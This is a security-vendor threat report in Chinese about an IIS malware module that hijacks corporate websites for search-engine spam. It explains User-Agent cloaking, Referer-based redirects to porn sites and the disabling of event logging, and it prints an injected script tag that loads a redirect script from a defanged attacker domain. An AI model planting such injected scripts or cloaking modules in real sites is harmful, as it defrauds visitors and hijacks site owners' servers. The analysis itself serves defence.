企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

360安全衛士發表於2020-09-21

網際網路資訊服務(Internet Information Services)是由微軟公司提供的基於執行Microsoft Windows的網際網路基本服務,大多數Windows系統伺服器均有安裝,常用來執行Web服務。而當這一底層架構被惡意駭客盯上,網路威脅自然隨之而來。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


近日,360安全大腦獨家發現一新型惡意模組,被駭客植入其攻陷的IIS WEB伺服器,並利用該惡意模組替換IIS服務中的一個服務元件,躲避檢測查殺。經360安全大腦分析,本次攻擊事件最早開始於2020年8月,駭客攻陷數個知名雲服務提供商的數十臺伺服器,受影響網站數量高達幾千例,360安全大腦第一時間發出緊急安全預警。


攻陷公用雲主機伺服器

“染毒蜘蛛”過境數千網站


360安全大腦分析發現,被攻擊伺服器主要為公用雲主機伺服器,且通常駭客攻陷一個公用雲主機伺服器後,即可直接獲得幾十甚至上百個網站的控制權,其中不乏企業官網。360安全大腦監測資料顯示,此次遭攻擊伺服器高達數十臺,幾千個網站受波及。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

(部分受害企業)


鑑於上述情況,360安全大腦第一時間對樣本展開分析,隨後發現駭客在攻陷目標伺服器後,會從網上下載一個包含db.db、dd.cc、e.cc模組、x64.dd、x86.dd五個檔案的惡意壓縮包,各檔案功能具體如下:


db.db 是一個SQLite3資料庫檔案。主要包含惡意模組需要的網站模版及關鍵字等資訊,此檔案後續會被寫入IIS目錄下的inetsrv\modrqflt.dll:db.db檔案中,這是一個擁有FILE_ATTRIBUTE_INTEGRITY_STREAM屬性的檔案,在目錄下不可見。


dd.cc是駭客開發的惡意模組安裝工具。駭客使用該工具可改變modrqflt.dll的訪問控制許可權(DACL),從而成功將modrqflt.dll重新命名為cache.dll,並將惡意程式改名為modrqflt.dll。


e.cc模組是用來停止被攻陷伺服器日誌記錄的功能。執行之後,其會遍歷執行緒找到Eventlog服務的執行緒並停止,以此來停止日誌記錄的功能。


x64.dd為駭客編寫的64位惡意modrqflt.dll,主要用來替換C:\Windows\System32\inetsrv下iis伺服器自帶的modrqflt.dll。


x86.dd 則是駭客編寫的32位惡意modrqflt.dll,主要用來替換C:\Windows\SysWOW64\inetsrv下的modrqflt.dll。



企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

(駭客攻陷目標伺服器後下載的惡意壓縮包)


modrqflt.dll是提供請求過濾處理(Request filtering handler)的功能模組,而成功替換後,駭客便可以過濾掉網站正常訪問請求,專門為搜尋引擎蜘蛛(爬蟲)提供色情素材。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


完成惡意模組的替換後,當搜尋引擎蜘蛛(爬蟲)訪問網站原本失效連結時,此模組即會生成一個包含大量連結的“空白”頁面,並將HTTP響應碼由404改為200來欺騙“蜘蛛”(爬蟲)。而“蜘蛛”在獲取該頁面後,會繼續訪問頁面中的所有連結,並抽取關鍵字存入搜尋資料庫。此時,如果有使用者搜尋對應關鍵詞,就會返回上述偽造連結及頁面,如果惡意DLL仍然存在,則會直接跳轉到色情網站。


空白頁面神隱“透明”網址

騙過爬蟲蜘蛛猖狂搞顏色


404頁面並不少見,通常是由於伺服器地址變動,或者維護不到位等因素導致網站個別連結失效。正常情況下,當搜尋引擎蜘蛛爬取時遇到此類連結,也會顯示404頁面,但對於遭遇駭客攻陷的網站來說,其失效連結則會騙過“蜘蛛”,顯示空白頁面卻在原始碼中暗藏大量連結。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


看到這裡你或許會有疑問,中招的網站怎麼區分正常的使用者和爬蟲呢?其實當使用者使用瀏覽器開啟一個網站,瀏覽器向網站伺服器發出請求時,會在請求資料頭部設定一個User-Agent的欄位,例如訪問百度時:


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


而當搜尋引擎爬取時,User-Agent設定的則有一些不一樣:


百度蜘蛛

Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

360蜘蛛:

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider

神馬蜘蛛:

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36

搜狗蜘蛛:

Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


此次事件中,不法駭客下載的惡意模組會透過判斷User-Agent區分使用者和蜘蛛(爬蟲),當識別為搜尋引擎蜘蛛後,就會返回上述100條連結,其中前80條hostname是惡意模組生成的隨機頁面,與當前網站的hostname一致;後20條hostname則是其他受害網站生成的隨機頁面,均為介面hxxp://zjclasjsdknlnxsa.com:8081/ping返回(此介面需要特殊User-Agent才能訪問)。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


與此同時,100條隨機生成的頁面連結,看似雜亂無章其實暗藏一定規律的,它們的URL一般是由下圖中的規則構成,即[]中的為可選。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


參照上圖的URL規則,觀察隨機連結中的path欄位會發現,它們全都是以lista/xzs/api/bks開頭,且以上四個關鍵詞,分別對應了四套惡意模組使用網站模版。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


在生成網頁過程中,程式還會隨機讀取keyword等其他表中的資料,以此來替換網站模版中的對應留空位置。四套模版執行如下圖所示:


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


上述網頁顯示內容,都是訪問受害網址時資料庫關鍵字替換隨機生成的,搜尋引擎蜘蛛(爬蟲)則會將上述偽造的URL和頁面快取在資料庫中。當使用者在搜尋引擎中搜尋色情關鍵詞,一旦命中上述偽造頁面內容,那麼搜尋引擎就會返回上述偽造的URL和頁面摘要。


此時,如若使用者點選頁面網址,瀏覽器則會預設設定Referer欄位,以此來標明是從那個連結找到當前的連結。惡意模組正是利用這一點,區分當前訪問頁面是否來自於百度/360/搜狗/神馬等國內搜尋引擎中的一種。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


特別是,如果介面hxxp://zjclasjsdknlnxsa.com:8081/jump有返回資料,則會設定頁面的內容為介面返回的資料:


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


如若沒有獲取到介面資料,則會訪問db.db資料庫,將jump中的程式碼插入網頁中:

<script type="text/javascript" src="hxxp://zjclasjsdknlnxsa.com/js/jump.js"></script>


jump.js內容如下:


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


上述程式碼的主要功能就是跳轉到最終的色情網站:


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局


而當我們在某搜尋引擎搜尋受害網站關鍵詞時,點選搜尋的連結,開啟的就是色情網址hxxps://2**sg.xyz/,雖然原網址完全是一個正規網站。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

(搜尋網址為色情網站)


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局

(受害網站原網址為正規網站)



黑灰產業鏈持續發酵

360安全大腦強勢出擊


經360安全大腦研判分析,此次是黑灰產業鏈的持續性攻擊事件,駭客團伙使用專業的滲透技術對各類網站進行攻擊並植入木馬,非法獲取伺服器控制權,並在隨意管控攻陷的肉雞伺服器的基礎上,利用搜尋引流擴散色情詐騙內容,影響正規網站正常業務執行。


現階段,駭客團伙攻擊仍在持續,廣大使用者應格外警惕,避免遭受不必要的損失。對此,360安全大腦給出如下安全建議:

1、儘快前往weishi.360.cn,下載安裝360安全衛士,有效攔截各類病毒木馬攻擊,保護電腦隱私及財產安全;

2、注重伺服器安全管理,規範安全等級保護工作,及時更新漏洞補丁;

3、建立網站安全策略,防止攻擊發生時危害進一步擴大。


企業官網慘變色情網站,360安全大腦獨家揭秘幕後騙局



相關文章